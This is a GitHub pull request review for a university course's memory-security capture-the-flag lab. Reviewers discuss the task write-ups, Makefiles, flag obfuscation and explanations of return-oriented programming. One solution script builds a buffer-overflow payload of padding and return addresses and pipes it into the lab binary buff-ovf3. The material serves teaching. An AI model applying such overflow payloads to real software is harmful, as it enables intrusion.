chapters/memory-security/ctf: Add CTF lab #25
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
valudimi
added
needs-rendering
valudimi
added
needs-rendering
valudimi
force-pushed
the
ctf
branch
7 times, most recently
from
4d8df52
to
ae57d78
Compare
teodutu
requested changes
Aug 29, 2024
There was a problem hiding this comment.
Things are looking well for the most part. Below are some things that are missing, besides my inline comments.
- Some exercises are missing their source code, such as
feeling-chained. You can find them here [1]. Add them to thesolution/folders so we don't lose them and have them all in one place. - Add the makefiles to all exercises because some of them define necessary compiler flags such as
-fno-stack-protector - Provide the paths to all files that students must use. For example write
task-name/support/binaryinstead of justbinary. - Modify all flags to start with
HSI_instead ofiocla_and then useobfuscate.c[2] to embed it in the source code. I'm not sure whether to add the contents of [2] to every task'ssolution/folder or not. Let's not do this for now since this tool is also used for CTFs which need to be private because they are contests. We can always add it later if needed.
[1] https://github.com/systems-cs-pub-ro/iocla-internal/tree/master/laboratoare/content/ctf/sol
[2] https://github.com/systems-cs-pub-ro/iocla-internal/tree/master/comunitate/ctf/obfuscator
chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/main.c
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-1/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/indirect-business/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/hidden-in-plain-sight-2/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/look-at-him-go/solution/README.md
Show resolved
Hide resolved
github-actions
bot
added
area/infra
valudimi
force-pushed
the
ctf
branch
4 times, most recently
from
35c21ec
to
c2e5f6b
Compare
|
Don't forget to add the sources for the binaries so we have them all in one place. |
valudimi
force-pushed
the
ctf
branch
3 times, most recently
from
868fcb1
to
9780701
Compare
valudimi
force-pushed
the
ctf
branch
3 times, most recently
from
b5482b1
to
d067509
Compare
valudimi
added
needs-rendering
valudimi
force-pushed
the
ctf
branch
11 times, most recently
from
81e87f2
to
9b0cd80
Compare
valudimi
added
needs-rendering
teodutu
requested changes
Sep 14, 2024
chapters/memory-security/ctf/drills/tasks/feeling-chained/support/Makefile
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/obfuscator.c
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/solution/README.md
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/feeling-chained/support/buff-ovf3
Outdated
Show resolved
Hide resolved
| @@ -0,0 +1,30 @@ | |||
| # Solution | |||
|
|
|||
| In a nature similar to that of the previous exercise, we take a close look at the `objdump` disassembly output of the binary using the `objdump -D -M intel link2` command, specifically focusing on the `helper()` function: | |||
There was a problem hiding this comment.
Replace "previous exercise" with [hidden-in-plain-sight-1](link/to/hidden-in-plain-sight-1).
chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
Outdated
Show resolved
Hide resolved
chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Add an image to showcase the stack after sending the payload: which values point to gadgets and which numbers are popped into register. Use https://app.diagrams.net/ to create and save it in .SVG format.
There was a problem hiding this comment.
On second thought, this might not be needed.
| In this laboratory, you will have to apply most of the concepts presented throughout this course under the format of `Capture-The-Flag` tasks. | ||
| These tasks will test your understanding and mastery of specific static and dynamic analysis methods and tools, the compilation process, assembly language - syntax, registers, memory handling, functions, - as well as your ability to identify and exploit simple buffer overflow vulnerabilities. | ||
|
|
||
| ## Return Oriented Programming |
There was a problem hiding this comment.
You need to expand on what gadgets are and what ROPs do. I created the image below for a ROP demo I made the other day. You can use it as a start. Explain what happens step by step, which value on the stack goes where and it should be clearer.
There was a problem hiding this comment.
Bump on this though. This would be of great use. You already have the image above, just add some text to walk students through it.
This commit adds the adapted material, including references and sentence rephrasing for enhanced readability, as well as solution writeups. Signed-off-by: Dimitrie Valu <[email protected]>
NickZaharia308
added
needs-rendering
teodutu
requested changes
Oct 4, 2024
| @@ -0,0 +1,3 @@ | |||
| #!/bin/bash | |||
|
|
|||
There was a problem hiding this comment.
Suggested change
| # SPDX-License-Identifier: BSD-3-Clause | |
| @@ -0,0 +1,3 @@ | |||
| #!/bin/bash | |||
|
|
|||
| python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3 | |||
There was a problem hiding this comment.
Suggested change
| python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ./buff-ovf3 | |
| python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x0c\x87\x04\x08" + b"\xb7\x86\x04\x08" + b"\x38\x00\x00\x00" + b"\x0d\x00\x00\x00")' | ../support/buff-ovf3 |
Use the relative path to the binary so the script can be run directly from here.
There was a problem hiding this comment.
On second thought, this might not be needed.
| In this laboratory, you will have to apply most of the concepts presented throughout this course under the format of `Capture-The-Flag` tasks. | ||
| These tasks will test your understanding and mastery of specific static and dynamic analysis methods and tools, the compilation process, assembly language - syntax, registers, memory handling, functions, - as well as your ability to identify and exploit simple buffer overflow vulnerabilities. | ||
|
|
||
| ## Return Oriented Programming |
There was a problem hiding this comment.
Bump on this though. This would be of great use. You already have the image above, just add some text to walk students through it.
NickZaharia308
requested changes
Oct 6, 2024
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Prerequisite Checklist
Description of changes
This commit adds the adapted material, including references and sentence rephrasing for enhanced readability, as well as solution writeups.